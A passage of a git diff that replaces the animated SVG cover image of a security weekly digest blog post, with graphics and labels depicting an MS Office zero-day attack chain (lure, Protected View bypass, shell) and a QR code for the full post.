+    <path d="M0 0h7v1h-7zM8 0h1v1h-1zM10 0h3v1h-3zM14 0h2v1h-2zM18 0h2v1h-2zM21 0h1v1h-1zM24 0h4v1h-4zM30 0h1v1h-1zM32 0h1v1h-1zM35 0h3v1h-3zM40 0h1v1h-1zM42 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM10 1h3v1h-3zM18 1h2v1h-2zM21 1h4v1h-4zM26 1h1v1h-1zM29 1h5v1h-5zM36 1h1v1h-1zM38 1h3v1h-3zM42 1h1v1h-1zM48 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM9 2h2v1h-2zM12 2h1v1h-1zM15 2h2v1h-2zM18 2h1v1h-1zM20 2h1v1h-1zM22 2h1v1h-1zM25 2h3v1h-3zM30 2h1v1h-1zM34 2h1v1h-1zM39 2h2v1h-2zM42 2h1v1h-1zM44 2h3v1h-3zM48 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h4v1h-4zM14 3h4v1h-4zM19 3h1v1h-1zM22 3h2v1h-2zM25 3h2v1h-2zM28 3h1v1h-1zM30 3h2v1h-2zM37 3h1v1h-1zM39 3h1v1h-1zM42 3h1v1h-1zM44 3h3v1h-3zM48 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h2v1h-2zM14 4h1v1h-1zM17 4h4v1h-4zM22 4h6v1h-6zM29 4h2v1h-2zM33 4h1v1h-1zM35 4h2v1h-2zM42 4h1v1h-1zM44 4h3v1h-3zM48 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM8 5h1v1h-1zM10 5h1v1h-1zM12 5h5v1h-5zM20 5h3v1h-3zM26 5h1v1h-1zM28 5h1v1h-1zM34 5h1v1h-1zM37 5h2v1h-2zM42 5h1v1h-1zM48 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h1v1h-1zM40 6h1v1h-1zM42 6h7v1h-7zM8 7h1v1h-1zM15 7h1v1h-1zM17 7h2v1h-2zM22 7h1v1h-1zM26 7h1v1h-1zM28 7h1v1h-1zM31 7h1v1h-1zM34 7h1v1h-1zM36 7h1v1h-1zM40 7h1v1h-1zM0 8h1v1h-1zM4 8h1v1h-1zM6 8h3v1h-3zM10 8h1v1h-1zM14 8h1v1h-1zM16 8h4v1h-4zM21 8h7v1h-7zM29 8h1v1h-1zM32 8h2v1h-2zM35 8h2v1h-2zM41 8h5v1h-5zM48 8h1v1h-1zM1 9h1v1h-1zM3 9h1v1h-1zM5 9h1v1h-1zM8 9h2v1h-2zM11 9h3v1h-3zM15 9h2v1h-2zM20 9h2v1h-2zM23 9h2v1h-2zM26 9h2v1h-2zM29 9h2v1h-2zM33 9h1v1h-1zM35 9h1v1h-1zM38 9h1v1h-1zM41 9h2v1h-2zM45 9h3v1h-3zM1 10h6v1h-6zM8 10h1v1h-1zM14 10h1v1h-1zM16 10h1v1h-1zM18 10h1v1h-1zM20 10h2v1h-2zM23 10h1v1h-1zM25 10h3v1h-3zM29 10h4v1h-4zM35 10h1v1h-1zM38 10h1v1h-1zM41 10h1v1h-1zM43 10h2v1h-2zM47 10h1v1h-1zM0 11h2v1h-2zM3 11h1v1h-1zM5 11h1v1h-1zM7 11h2v1h-2zM13 11h3v1h-3zM17 11h4v1h-4zM22 11h6v1h-6zM29 11h2v1h-2zM32 11h1v1h-1zM36 11h1v1h-1zM41 11h2v1h-2zM44 11h1v1h-1zM46 11h1v1h-1zM48 11h1v1h-1zM0 12h1v1h-1zM2 12h1v1h-1zM5 12h2v1h-2zM8 12h7v1h-7zM19 12h3v1h-3zM23 12h2v1h-2zM29 12h1v1h-1zM32 12h6v1h-6zM39 12h2v1h-2zM44 12h1v1h-1zM46 12h2v1h-2zM0 13h1v1h-1zM3 13h2v1h-2zM7 13h9v1h-9zM17 13h2v1h-2zM21 13h2v1h-2zM24 13h1v1h-1zM26 13h2v1h-2zM30 13h1v1h-1zM33 13h1v1h-1zM36 13h1v1h-1zM38 13h2v1h-2zM42 13h1v1h-1zM45 13h3v1h-3zM0 14h7v1h-7zM8 14h2v1h-2zM14 14h1v1h-1zM20 14h2v1h-2zM24 14h1v1h-1zM30 14h2v1h-2zM33 14h2v1h-2zM38 14h1v1h-1zM40 14h3v1h-3zM0 15h1v1h-1zM2 15h1v1h-1zM8 15h1v1h-1zM12 15h1v1h-1zM14 15h2v1h-2zM19 15h2v1h-2zM23 15h6v1h-6zM30 15h1v1h-1zM35 15h1v1h-1zM37 15h2v1h-2zM40 15h1v1h-1zM43 15h2v1h-2zM46 15h2v1h-2zM5 16h4v1h-4zM10 16h3v1h-3zM16 16h4v1h-4zM23 16h2v1h-2zM26 16h3v1h-3zM34 16h2v1h-2zM37 16h1v1h-1zM40 16h2v1h-2zM43 16h2v1h-2zM7 17h2v1h-2zM11 17h1v1h-1zM13 17h2v1h-2zM16 17h1v1h-1zM20 17h1v1h-1zM23 17h1v1h-1zM26 17h1v1h-1zM28 17h2v1h-2zM31 17h1v1h-1zM33 17h2v1h-2zM39 17h1v1h-1zM42 17h2v1h-2zM45 17h1v1h-1zM47 17h2v1h-2zM3 18h1v1h-1zM6 18h2v1h-2zM9 18h1v1h-1zM11 18h1v1h-1zM13 18h2v1h-2zM16 18h2v1h-2zM25 18h2v1h-2zM29 18h1v1h-1zM31 18h4v1h-4zM36 18h1v1h-1zM40 18h3v1h-3zM45 18h2v1h-2zM0 19h3v1h-3zM4 19h2v1h-2zM11 19h1v1h-1zM19 19h1v1h-1zM21 19h2v1h-2zM24 19h4v1h-4zM30 19h2v1h-2zM36 19h1v1h-1zM40 19h1v1h-1zM43 19h2v1h-2zM46 19h2v1h-2zM3 20h1v1h-1zM5 20h4v1h-4zM12 20h3v1h-3zM20 20h1v1h-1zM22 20h4v1h-4zM27 20h1v1h-1zM32 20h5v1h-5zM40 20h9v1h-9zM3 21h3v1h-3zM7 21h2v1h-2zM12 21h1v1h-1zM14 21h2v1h-2zM17 21h1v1h-1zM20 21h1v1h-1zM23 21h1v1h-1zM27 21h2v1h-2zM30 21h1v1h-1zM32 21h2v1h-2zM35 21h2v1h-2zM38 21h2v1h-2zM41 21h2v1h-2zM48 21h1v1h-1zM2 22h1v1h-1zM4 22h5v1h-5zM10 22h6v1h-6zM19 22h1v1h-1zM22 22h6v1h-6zM29 22h2v1h-2zM32 22h2v1h-2zM35 22h1v1h-1zM38 22h9v1h-9zM0 23h2v1h-2zM3 23h2v1h-2zM8 23h1v1h-1zM14 23h2v1h-2zM18 23h3v1h-3zM22 23h1v1h-1zM26 23h1v1h-1zM31 23h1v1h-1zM33 23h4v1h-4zM38 23h3v1h-3zM44 23h3v1h-3zM48 23h1v1h-1zM2 24h1v1h-1zM4 24h1v1h-1zM6 24h1v1h-1zM8 24h2v1h-2zM11 24h1v1h-1zM15 24h1v1h-1zM17 24h2v1h-2zM22 24h1v1h-1zM24 24h1v1h-1zM26 24h2v1h-2zM29 24h2v1h-2zM32 24h1v1h-1zM34 24h7v1h-7zM42 24h1v1h-1zM44 24h4v1h-4zM0 25h2v1h-2zM4 25h1v1h-1zM8 25h1v1h-1zM13 25h3v1h-3zM17 25h1v1h-1zM19 25h4v1h-4zM26 25h1v1h-1zM29 25h2v1h-2zM32 25h2v1h-2zM35 25h2v1h-2zM38 25h1v1h-1zM40 25h1v1h-1zM44 25h2v1h-2zM1 26h9v1h-9zM12 26h2v1h-2zM17 26h2v1h-2zM22 26h5v1h-5zM29 26h2v1h-2zM32 26h2v1h-2zM37 26h1v1h-1zM39 26h7v1h-7zM47 26h1v1h-1zM0 27h3v1h-3zM7 27h1v1h-1zM10 27h1v1h-1zM12 27h3v1h-3zM16 27h3v1h-3zM23 27h1v1h-1zM27 27h1v1h-1zM29 27h1v1h-1zM32 27h2v1h-2zM36 27h3v1h-3zM40 27h1v1h-1zM46 27h3v1h-3zM1 28h1v1h-1zM3 28h4v1h-4zM15 28h2v1h-2zM18 28h1v1h-1zM20 28h3v1h-3zM24 28h4v1h-4zM32 28h5v1h-5zM40 28h3v1h-3zM44 28h1v1h-1zM46 28h3v1h-3zM0 29h3v1h-3zM5 29h1v1h-1zM8 29h5v1h-5zM14 29h1v1h-1zM18 29h3v1h-3zM22 29h2v1h-2zM25 29h4v1h-4zM30 29h1v1h-1zM32 29h2v1h-2zM38 29h1v1h-1zM40 29h2v1h-2zM44 29h1v1h-1zM6 30h2v1h-2zM10 30h1v1h-1zM12 30h1v1h-1zM15 30h2v1h-2zM19 30h1v1h-1zM21 30h1v1h-1zM23 30h3v1h-3zM30 30h1v1h-1zM33 30h1v1h-1zM35 30h1v1h-1zM37 30h1v1h-1zM39 30h3v1h-3zM43 30h2v1h-2zM46 30h1v1h-1zM5 31h1v1h-1zM7 31h1v1h-1zM9 31h2v1h-2zM12 31h1v1h-1zM14 31h4v1h-4zM21 31h2v1h-2zM24 31h1v1h-1zM26 31h1v1h-1zM28 31h2v1h-2zM31 31h1v1h-1zM33 31h2v1h-2zM42 31h1v1h-1zM46 31h2v1h-2zM0 32h1v1h-1zM3 32h4v1h-4zM8 32h1v1h-1zM11 32h1v1h-1zM14 32h1v1h-1zM18 32h1v1h-1zM26 32h1v1h-1zM29 32h5v1h-5zM36 32h1v1h-1zM38 32h1v1h-1zM41 32h1v1h-1zM43 32h1v1h-1zM45 32h1v1h-1zM47 32h1v1h-1zM1 33h1v1h-1zM5 33h1v1h-1zM8 33h1v1h-1zM10 33h1v1h-1zM15 33h4v1h-4zM20 33h1v1h-1zM22 33h6v1h-6zM30 33h1v1h-1zM32 33h1v1h-1zM35 33h5v1h-5zM41 33h1v1h-1zM44 33h2v1h-2zM47 33h1v1h-1zM5 34h2v1h-2zM9 34h3v1h-3zM14 34h9v1h-9zM24 34h2v1h-2zM27 34h2v1h-2zM34 34h2v1h-2zM37 34h1v1h-1zM40 34h2v1h-2zM43 34h1v1h-1zM45 34h2v1h-2zM0 35h5v1h-5zM7 35h1v1h-1zM13 35h2v1h-2zM16 35h2v1h-2zM19 35h2v1h-2zM24 35h1v1h-1zM26 35h3v1h-3zM30 35h1v1h-1zM32 35h1v1h-1zM34 35h3v1h-3zM38 35h1v1h-1zM41 35h2v1h-2zM44 35h1v1h-1zM46 35h1v1h-1zM0 36h2v1h-2zM4 36h1v1h-1zM6 36h1v1h-1zM8 36h2v1h-2zM11 36h3v1h-3zM16 36h1v1h-1zM19 36h4v1h-4zM26 36h2v1h-2zM32 36h1v1h-1zM35 36h4v1h-4zM41 36h1v1h-1zM45 36h4v1h-4zM0 37h1v1h-1zM5 37h1v1h-1zM7 37h1v1h-1zM10 37h7v1h-7zM20 37h1v1h-1zM22 37h3v1h-3zM27 37h4v1h-4zM32 37h2v1h-2zM36 37h3v1h-3zM40 37h2v1h-2zM43 37h2v1h-2zM47 37h2v1h-2zM1 38h1v1h-1zM5 38h3v1h-3zM9 38h1v1h-1zM11 38h2v1h-2zM14 38h2v1h-2zM17 38h4v1h-4zM22 38h1v1h-1zM25 38h1v1h-1zM29 38h4v1h-4zM38 38h2v1h-2zM43 38h2v1h-2zM46 38h1v1h-1zM1 39h3v1h-3zM8 39h1v1h-1zM10 39h1v1h-1zM16 39h1v1h-1zM18 39h4v1h-4zM23 39h2v1h-2zM26 39h2v1h-2zM31 39h3v1h-3zM35 39h4v1h-4zM43 39h4v1h-4zM48 39h1v1h-1zM0 40h3v1h-3zM6 40h3v1h-3zM10 40h5v1h-5zM17 40h2v1h-2zM21 40h7v1h-7zM29 40h2v1h-2zM32 40h2v1h-2zM35 40h2v1h-2zM40 40h5v1h-5zM46 40h1v1h-1zM48 40h1v1h-1zM8 41h2v1h-2zM16 41h1v1h-1zM18 41h3v1h-3zM22 41h1v1h-1zM26 41h8v1h-8zM35 41h1v1h-1zM38 41h3v1h-3zM44 41h2v1h-2zM47 41h1v1h-1zM0 42h7v1h-7zM8 42h2v1h-2zM12 42h2v1h-2zM16 42h3v1h-3zM20 42h3v1h-3zM24 42h1v1h-1zM26 42h2v1h-2zM29 42h3v1h-3zM35 42h1v1h-1zM37 42h1v1h-1zM40 42h1v1h-1zM42 42h1v1h-1zM44 42h2v1h-2zM47 42h1v1h-1zM0 43h1v1h-1zM6 43h1v1h-1zM9 43h4v1h-4zM15 43h4v1h-4zM21 43h2v1h-2zM26 43h2v1h-2zM32 43h2v1h-2zM36 43h3v1h-3zM40 43h1v1h-1zM44 43h1v1h-1zM46 43h3v1h-3zM0 44h1v1h-1zM2 44h3v1h-3zM6 44h1v1h-1zM8 44h1v1h-1zM11 44h4v1h-4zM16 44h2v1h-2zM19 44h9v1h-9zM29 44h2v1h-2zM32 44h2v1h-2zM36 44h1v1h-1zM39 44h6v1h-6zM46 44h1v1h-1zM48 44h1v1h-1zM0 45h1v1h-1zM2 45h3v1h-3zM6 45h1v1h-1zM9 45h3v1h-3zM14 45h1v1h-1zM17 45h2v1h-2zM21 45h1v1h-1zM23 45h1v1h-1zM25 45h7v1h-7zM33 45h1v1h-1zM38 45h1v1h-1zM40 45h2v1h-2zM45 45h1v1h-1zM47 45h1v1h-1zM0 46h1v1h-1zM2 46h3v1h-3zM6 46h1v1h-1zM10 46h4v1h-4zM17 46h2v1h-2zM20 46h3v1h-3zM25 46h1v1h-1zM27 46h2v1h-2zM33 46h1v1h-1zM36 46h1v1h-1zM40 46h1v1h-1zM42 46h2v1h-2zM0 47h1v1h-1zM6 47h1v1h-1zM11 47h5v1h-5zM18 47h4v1h-4zM24 47h1v1h-1zM27 47h2v1h-2zM30 47h1v1h-1zM35 47h1v1h-1zM37 47h2v1h-2zM46 47h2v1h-2zM0 48h7v1h-7zM8 48h1v1h-1zM10 48h3v1h-3zM14 48h3v1h-3zM18 48h2v1h-2zM21 48h1v1h-1zM23 48h1v1h-1zM26 48h3v1h-3zM34 48h2v1h-2zM37 48h1v1h-1zM39 48h1v1h-1zM41 48h5v1h-5zM47 48h2v1h-2z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
+</svg>

--- a/assets/images/2026-01-28-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_CTEM_Grist_Core_RCE.svg
+++ b/assets/images/2026-01-28-Tech_Security_Weekly_Digest_MS_Office_Zero_Day_CTEM_Grist_Core_RCE.svg
@@ -1,134 +1,391 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - January 28, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Tech Security Weekly Digest January 28 2026: MS Office Zero-Day CVE-2026-21509, Grist Core RCE, CTEM Framework">
+<title>MS Office Zero-Day CVE-2026-21509 CTEM Grist Core RCE - Jan 28 2026</title>
+<!-- profile: high-quality-cover (L20 Hero+2-Card, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgMain" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#080F1E"/>
+    <stop offset="55%" stop-color="#0A1225"/>
+    <stop offset="100%" stop-color="#0D0E28"/>
+  </linearGradient>
+  <linearGradient id="heroGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#111827"/>
+    <stop offset="100%" stop-color="#0C1421"/>
+  </linearGradient>
+  <linearGradient id="tr1Grad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#1A1226"/>
+    <stop offset="100%" stop-color="#130E1E"/>
+  </linearGradient>
+  <linearGradient id="br1Grad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0E1A14"/>
+    <stop offset="100%" stop-color="#0A1410"/>
+  </linearGradient>
+  <linearGradient id="termBg" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0D1117"/>
+    <stop offset="100%" stop-color="#080D10"/>
+  </linearGradient>
+  <linearGradient id="docGrad" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#E8F0FE"/>
+    <stop offset="100%" stop-color="#C5D5F8"/>
+  </linearGradient>
+  <linearGradient id="exploitFlare" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0"/>
+    <stop offset="50%" stop-color="#FF4757" stop-opacity="0.9"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </linearGradient>
+  <linearGradient id="ctemBar1" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#06D6A0"/>
+    <stop offset="100%" stop-color="#05A880"/>
+  </linearGradient>
+  <linearGradient id="ctemBar2" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#118AB2"/>
+    <stop offset="100%" stop-color="#0D6F8E"/>
+  </linearGradient>
+  <linearGradient id="ctemBar3" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#FFD166"/>
+    <stop offset="100%" stop-color="#F4B93E"/>
+  </linearGradient>
+  <linearGradient id="ctemBar4" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#EF476F"/>
+    <stop offset="100%" stop-color="#C73558"/>
+  </linearGradient>
+  <linearGradient id="ctemBar5" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#8338EC"/>
+    <stop offset="100%" stop-color="#6020C8"/>
+  </linearGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF6B35" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#FF6B35" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowGreen" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#06D6A0" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#06D6A0" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="36" height="36" patternUnits="userSpaceOnUse">
+    <circle cx="18" cy="18" r="0.7" fill="#2A3558" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="3"/>
+    <feOffset dx="2" dy="4"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.5"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="txtGlow" x="-20%" y="-20%" width="140%" height="140%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.5"/>
+    <feOffset dx="1" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.65"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- Canvas background -->
+<rect width="1200" height="630" fill="url(#bgMain)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Ambient glows -->
+<circle cx="280" cy="300" r="160" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.9;0.5" dur="7.2s" repeatCount="indefinite"/>
+  <animate attributeName="r" values="160;178;160" dur="9.5s" repeatCount="indefinite"/>
+</circle>
+<circle cx="900" cy="170" r="120" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.4;0.8;0.4" dur="6.1s" repeatCount="indefinite"/>
+  <animate attributeName="r" values="120;138;120" dur="8.3s" repeatCount="indefinite"/>
+</circle>
+<circle cx="910" cy="490" r="110" fill="url(#glowGreen)">
+  <animate attributeName="opacity" values="0.35;0.7;0.35" dur="8.4s" repeatCount="indefinite"/>
+  <animate attributeName="r" values="110;126;110" dur="10.2s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Starfield twinkles (12) -->
+<g fill="#7FB2FF">
+  <circle cx="140" cy="58" r="1.1"><animate attributeName="opacity" values="0.2;1;0.2" dur="3.3s" repeatCount="indefinite"/></circle>
+  <circle cx="390" cy="65" r="0.9"><animate attributeName="opacity" values="0.15;0.9;0.15" dur="4.6s" repeatCount="indefinite"/></circle>
+  <circle cx="700" cy="61" r="1.2"><animate attributeName="opacity" values="0.2;0.95;0.2" dur="3.8s" repeatCount="indefinite"/></circle>
+  <circle cx="1050" cy="68" r="0.8"><animate attributeName="opacity" values="0.15;0.85;0.15" dur="5.4s" repeatCount="indefinite"/></circle>
+  <circle cx="70" cy="340" r="1.0"><animate attributeName="opacity" values="0.18;0.8;0.18" dur="4.9s" repeatCount="indefinite"/></circle>
+  <circle cx="630" cy="310" r="1.1"><animate attributeName="opacity" values="0.2;0.9;0.2" dur="3.5s" repeatCount="indefinite"/></circle>
+  <circle cx="1170" cy="320" r="0.9"><animate attributeName="opacity" values="0.15;0.8;0.15" dur="4.2s" repeatCount="indefinite"/></circle>
+  <circle cx="22" cy="508" r="0.8"><animate attributeName="opacity" values="0.15;0.75;0.15" dur="5.7s" repeatCount="indefinite"/></circle>
+  <circle cx="622" cy="518" r="1.2"><animate attributeName="opacity" values="0.2;0.95;0.2" dur="4.0s" repeatCount="indefinite"/></circle>
+  <circle cx="1185" cy="510" r="0.9"><animate attributeName="opacity" values="0.18;0.85;0.18" dur="4.8s" repeatCount="indefinite"/></circle>
+  <circle cx="250" cy="600" r="1.1"><animate attributeName="opacity" values="0.15;0.8;0.15" dur="5.8s" repeatCount="indefinite"/></circle>
+  <circle cx="1090" cy="592" r="1.0"><animate attributeName="opacity" values="0.18;0.88;0.18" dur="4.3s" repeatCount="indefinite"/></circle>
+</g>
+
+<!-- Top header stripe -->
+<rect x="0" y="0" width="1200" height="56" fill="#030810" opacity="0.95"/>
+<text x="36" y="36" font-family="Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#7FB2FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.01.28</text>
+<rect x="0" y="54" width="1200" height="2" fill="#E63946" opacity="0.85">
+  <animate attributeName="opacity" values="0.35;1;0.35" dur="4.5s" repeatCount="indefinite"/>
+</rect>
+
+<!-- ================== HERO LEFT PANEL: MS Office Zero-Day ================== -->
+<rect x="32" y="80" width="600" height="510" rx="14" ry="14" fill="url(#heroGrad)" stroke="#E63946" stroke-width="1.8" opacity="0.98"/>
+<rect x="32" y="80" width="600" height="4" fill="#E63946">
+  <animate attributeName="opacity" values="0.5;1;0.5" dur="3.6s" repeatCount="indefinite"/>
+</rect>
+
+<!-- Hero eyebrow + title -->
+<text x="54" y="114" font-family="Helvetica, Arial, sans-serif" font-size="13" font-weight="700" fill="#FF6B80" letter-spacing="3">CRITICAL  /  CVE-2026-21509</text>
+<text x="54" y="148" font-family="Helvetica, Arial, sans-serif" font-size="31" font-weight="800" fill="#F8FAFC" filter="url(#txtGlow)">MS Office Zero-Day</text>
+<text x="54" y="176" font-family="Helvetica, Arial, sans-serif" font-size="18" font-weight="500" fill="#CBD5E1">Protected View bypass — active exploitation</text>
+
+<!-- Stage labels -->
+<text x="62" y="200" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9" font-weight="600">01 LURE</text>
+<text x="216" y="200" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9" font-weight="600">02 BYPASS</text>
+<text x="385" y="200" font-family="Helvetica, Arial, sans-serif" font-size="10" fill="#7DA3D9" font-weight="600">03 SHELL</text>
+
+<!-- Office doc icon -->
+<g transform="translate(56,204)" filter="url(#softShadow)">
+  <rect x="0" y="0" width="76" height="96" rx="5" ry="5" fill="url(#docGrad)" stroke="#7FB2FF" stroke-width="1.5"/>
+  <path d="M58 0 L76 18 L58 18 Z" fill="#A8C2F0" stroke="#7FB2FF" stroke-width="1"/>
+  <text x="10" y="52" font-family="Helvetica, Arial, sans-serif" font-size="26" font-weight="900" fill="#1F4E98">W</text>
+  <text x="8" y="72" font-family="Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#3A5998">DOCX</text>
+  <rect x="40" y="68" width="34" height="20" rx="3" fill="#E63946">
+    <animate attributeName="opacity" values="0.8;1;0.8" dur="1.8s" repeatCount="indefinite"/>
+  </rect>
+  <text x="44" y="83" font-family="Helvetica, Arial, sans-serif" font-size="9" font-weight="800" fill="#FFFFFF">EVIL</text>
+  <rect x="16" y="-18" width="44" height="14" rx="3" fill="#2A3558" stroke="#7FB2FF" stroke-width="0.8"/>
+  <text x="20" y="-7" font-family="Helvetica, Arial, sans-serif" font-size="8" fill="#7FB2FF">attach</text>
+</g>
+
+<!-- Arrow 1: doc to shield -->
+<path d="M142 248 L200 248" stroke="#E63946" stroke-width="2" fill="none" stroke-dasharray="5 3">
+  <animate attributeName="stroke-dashoffset" values="0;-16" dur="1.2s" repeatCount="indefinite"/>
+</path>
+<polygon points="200,244 210,248 200,252" fill="#E63946">
+  <animate attributeName="opacity" values="0.7;1;0.7" dur="1.2s" repeatCount="indefinite"/>
+</polygon>
+
+<!-- Protected View shield bypassed -->
+<g transform="translate(212,210)">
+  <path d="M40 0 L80 16 L80 56 Q80 88 40 104 Q0 88 0 56 L0 16 Z" fill="#1C2541" stroke="#E63946" stroke-width="2.2"/>
+  <line x1="22" y1="30" x2="58" y2="70" stroke="#E63946" stroke-width="3.5">
+    <animate attributeName="stroke-width" values="3;4.5;3" dur="1.4s" repeatCount="indefinite"/>
+  </line>
+  <line x1="58" y1="30" x2="22" y2="70" stroke="#E63946" stroke-width="3.5">
+    <animate attributeName="stroke-width" values="3;4.5;3" dur="1.4s" repeatCount="indefinite"/>
+  </line>
+  <text x="4" y="96" font-family="Helvetica, Arial, sans-serif" font-size="9" font-weight="700" fill="#FF6B80">BYPASSED</text>
+</g>
+
+<!-- Flare at bypass -->
+<ellipse cx="255" cy="248" rx="55" ry="18" fill="url(#exploitFlare)" opacity="0.6">
+  <animate attributeName="opacity" values="0.3;0.7;0.3" dur="2.1s" repeatCount="indefinite"/>
+  <animate attributeName="rx" values="55;68;55" dur="2.1s" repeatCount="indefinite"/>
+</ellipse>
+
+<!-- Spark dots (8) -->
+<g fill="#E63946">
+  <circle cx="212" cy="248" r="2.8"><animate attributeName="opacity" values="0;1;0" dur="2.0s" repeatCount="indefinite"/></circle>
+  <circle cx="300" cy="248" r="2.8"><animate attributeName="opacity" values="0;1;0" dur="2.3s" repeatCount="indefinite"/></circle>
+  <circle cx="256" cy="212" r="2.0"><animate attributeName="opacity" values="0;0.9;0" dur="1.8s" repeatCount="indefinite"/></circle>
+  <circle cx="256" cy="286" r="2.0"><animate attributeName="opacity" values="0;0.9;0" dur="2.5s" repeatCount="indefinite"/></circle>
+  <circle cx="220" cy="218" r="1.4"><animate attributeName="opacity" values="0;0.8;0" dur="3.1s" repeatCount="indefinite"/></circle>
+  <circle cx="292" cy="218" r="1.4"><animate attributeName="opacity" values="0;0.8;0" dur="2.7s" repeatCount="indefinite"/></circle>
+  <circle cx="220" cy="278" r="1.4"><animate attributeName="opacity" values="0;0.8;0" dur="2.2s" repeatCount="indefinite"/></circle>
+  <circle cx="292" cy="278" r="1.4"><animate attributeName="opacity" values="0;0.8;0" dur="3.4s" repeatCount="indefinite"/></circle>
+</g>
+
+<!-- Arrow 2: shield to terminal -->
+<path d="M302 248 L370 248" stroke="#E63946" stroke-width="2" fill="none" stroke-dasharray="5 3">
+  <animate attributeName="stroke-dashoffset" values="0;-16" dur="1.0s" repeatCount="indefinite"/>
+</path>
+<polygon points="370,244 380,248 370,252" fill="#E63946">
